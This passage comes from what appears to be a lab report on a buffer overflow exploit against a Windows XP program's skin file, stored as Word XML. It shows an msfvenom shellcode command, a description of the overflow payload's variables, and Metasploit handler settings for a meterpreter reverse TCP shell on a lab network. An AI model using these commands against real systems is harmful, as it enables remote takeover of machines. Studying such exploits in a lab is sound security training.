            </w:r>
          </w:p>
          <w:p w14:paraId="0A94DD6F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69BDE1A8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3486E896" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With the information gathered it is possible to create a shellcode with the bad characters specified. This step is done using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. In addition to specifying bad characters it must also specify that it should be created for Perl and using the alpha upper encoder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36959451" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>messagebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alpha_upper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -b '~$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%,=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">\' -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -o payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2367A864" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once the payload has been generated it can be placed within a file as the payload that the EIP will jump to. An example of this can be found in Appendix A - Payload.pl. This file consists of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> important variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB3CA4F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$start</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>formats the file to be accepted as a skin file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E652B91" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$junk1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Fills the buffer so that the next string fills the EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A451E9C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>directs the pointer to a jump command that will return to the top of the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B424B5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1410" w:hanging="1410"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Each iteration of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> skips a command that would otherwise have interrupted the running of the shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F10C06" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1410" w:hanging="1410"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$shellcode</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">This is where the code generated by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can be placed</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="19670" w:type="dxa"/>
        <w:tblInd w:w="-108" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7622"/>
        <w:gridCol w:w="12048"/>
      </w:tblGrid>
      <w:tr w:rsidR="00164B2A" w14:paraId="0E63553A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7622" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6766F49B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Then, when this code is executed and the payload.ini is injected as shown in Submitting Files, a message box will appear.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73C2C183" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1186AB50" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="1412" w:hanging="1412"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>This proves that it is possible to get code to execute from within the program.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7666E51D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="1412" w:hanging="1412"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64708D8F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CF382E3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12047" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="34F1136F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:keepNext/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="284"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DC9AF2F" wp14:editId="2D525FDD">
                  <wp:extent cx="1066680" cy="923759"/>
                  <wp:effectExtent l="0" t="0" r="120" b="0"/>
                  <wp:docPr id="22"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1066680" cy="923759"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                            <a:prstDash/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F83626B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Caption"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="44" w:name="_Toc71564052"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Figure 16 - Message Box</w:t>
            </w:r>
            <w:bookmarkEnd w:id="44"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13C947F2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc71564008"/>
      <w:r>
        <w:t>Reverse Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="2BD9D965" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>The next stage is to use this process to set up a more complex exploit. For this, a reverse shell was chosen. This will allow command line access to the machine that the exploit has been targeted at. The principle of this exploit is the same as previously shown, however, with the injection of a different payload.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9300" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9300"/>
      </w:tblGrid>
      <w:tr w:rsidR="00164B2A" w14:paraId="073808BD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3507"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="24" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="24" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="24" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="24" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F75C04C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Setup Network</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="435EFDD3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3030"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E3C55CE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>In order to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> setup the reverse shell both machines must be setup on the same network.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BB4849E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3030"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="375097DC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3030"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">First set the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>target(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>XP) machines IP to 192.168.2.21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29DEB36E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3030"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Next set the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>host(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>Kali) machines IP to 192.168.2.22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F965B00" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3030"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="262DF940" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3030"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Now it should be possible to ping between the machines.</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="5000" w:type="pct"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:left w:w="10" w:type="dxa"/>
                <w:right w:w="10" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="4504"/>
              <w:gridCol w:w="4570"/>
            </w:tblGrid>
            <w:tr w:rsidR="00164B2A" w14:paraId="42785C35" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4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BFD574" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="3030"/>
                    </w:tabs>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                  </w:pPr>
                  <w:r>
                    <w:t>Kali</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4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CAEBC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="3030"/>
                    </w:tabs>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                  </w:pPr>
                  <w:r>
                    <w:t>XP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00164B2A" w14:paraId="383740F6" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="1069"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4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76251D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="3030"/>
                    </w:tabs>
                    <w:spacing w:before="100" w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                    </w:rPr>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C346731" wp14:editId="1167AEB3">
                        <wp:extent cx="2783160" cy="564480"/>
                        <wp:effectExtent l="0" t="0" r="0" b="7020"/>
                        <wp:docPr id="2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783160" cy="564480"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:noFill/>
                                <a:ln>
                                  <a:noFill/>
                                  <a:prstDash/>
                                </a:ln>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4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A846E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="3030"/>
                    </w:tabs>
                    <w:spacing w:before="100" w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                    </w:rPr>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51A5D215" wp14:editId="61794D4A">
                        <wp:extent cx="2825640" cy="552600"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:docPr id="24"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b="42623"/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="2825640" cy="552600"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:noFill/>
                                <a:ln>
                                  <a:noFill/>
                                  <a:prstDash/>
                                </a:ln>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="3AC3DE68" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3030"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BB3DCAE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t>The first step is to setup the listener on the Kali machine. This is what will be used to connect to the target machine when the code executes on that machine. To achieve this the following payload can be used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E25C486" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F0FCD4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D203B0B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Then the appropriate options must be set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2885C94C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F883A35" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set RHOST 192.168.2.21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182DD5AE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set TARGET 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B2032" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75BEE98A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381248FF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To confirm these settings have been set correctly, the following command can be used to list the current configuration. An example of this can be seen in </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71480422 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 17 - Show Options</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30872DD6" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF6445B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA93A31" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0596EBAD" wp14:editId="09DBEC85">
            <wp:extent cx="5152320" cy="1514520"/>
            <wp:effectExtent l="0" t="0" r="0" b="9480"/>
            <wp:docPr id="25"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152320" cy="1514520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
